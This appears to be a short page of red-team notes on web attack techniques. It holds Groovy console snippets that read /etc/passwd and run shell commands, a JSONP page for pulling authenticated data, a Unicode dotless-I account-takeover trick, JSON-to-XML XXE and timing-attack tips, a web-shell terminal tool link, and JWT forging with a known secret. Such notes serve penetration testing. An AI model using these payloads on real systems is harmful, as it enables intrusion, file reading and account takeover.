xct's notes
Search…
Red Team
Blue Team
Other
Groovy Script Console
File-Read
1
new File("/etc/passwd").withReader('UTF-8') { reader ->
2
def line
3
while ((line = reader.readLine()) != null) {
4
println "${line}"
5
}
6
}
Copied!
RCE
1
def process = "ls -lah".execute()
2
println "${process.text}"
Copied!
1
def sout = new StringBuffer(), serr = new StringBuffer()
2
def proc = 'ls -lah'.execute()
3
proc.consumeProcessOutput(sout, serr)
4
proc.waitForOrKill(1000)
5
println "$sout"
Copied!
JsonP
Only useful if a jsonp endpoints requires authentication. A Victim at attacker.com will retrieve the data from victim.com and send its cookie along because of how jsonp works (Reference: https://www.sjoerdlangkemper.nl/2019/01/02/jsonp/).
1
<html>
2
<body>
3
<script>
4
function xct(a) {
5
6
alert(JSON.stringify(a));
7
8
}
9
</script>
10
<script src="targeturl?callback=xct"></script>
11
<body>
12
</html>
Copied!
Unicode Abuse
We can use some special characters like the dotless I to abuse "toUpperCase()", registering for example an admin email address. Reference: https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
Json to XML
Change JSON Post requests to XML Format, sometimes this works and can be used for XXE, e.g. https://twitter.com/11xuxx/status/1250764273623629826
HTTP/3 Clients
1
docker run -it 'ymuski/curl-http3' bash
Copied!
curl/HTTP3.md at master · curl/curl
GitHub
Interactive Shell from Web Shell
GitHub - mxrch/webwrap: Give me a web shell, I'll give you a terminal. 🌯
GitHub
Timeless Timing Attacks against Remote Targets
The idea is to use HTTP2 to send multiple requests in one which allows us to measure the difference, by looking at which comes back first. Repeat this a lot to get some statistical relevance.
Create JWT from Secret Key via PyJWT
1
import jwt
2
data = {"data": {"username": "xct"}}
3
print(jwt.encode(data, "6cb9...", algorithm="HS256"))
Copied!
Last modified 9mo ago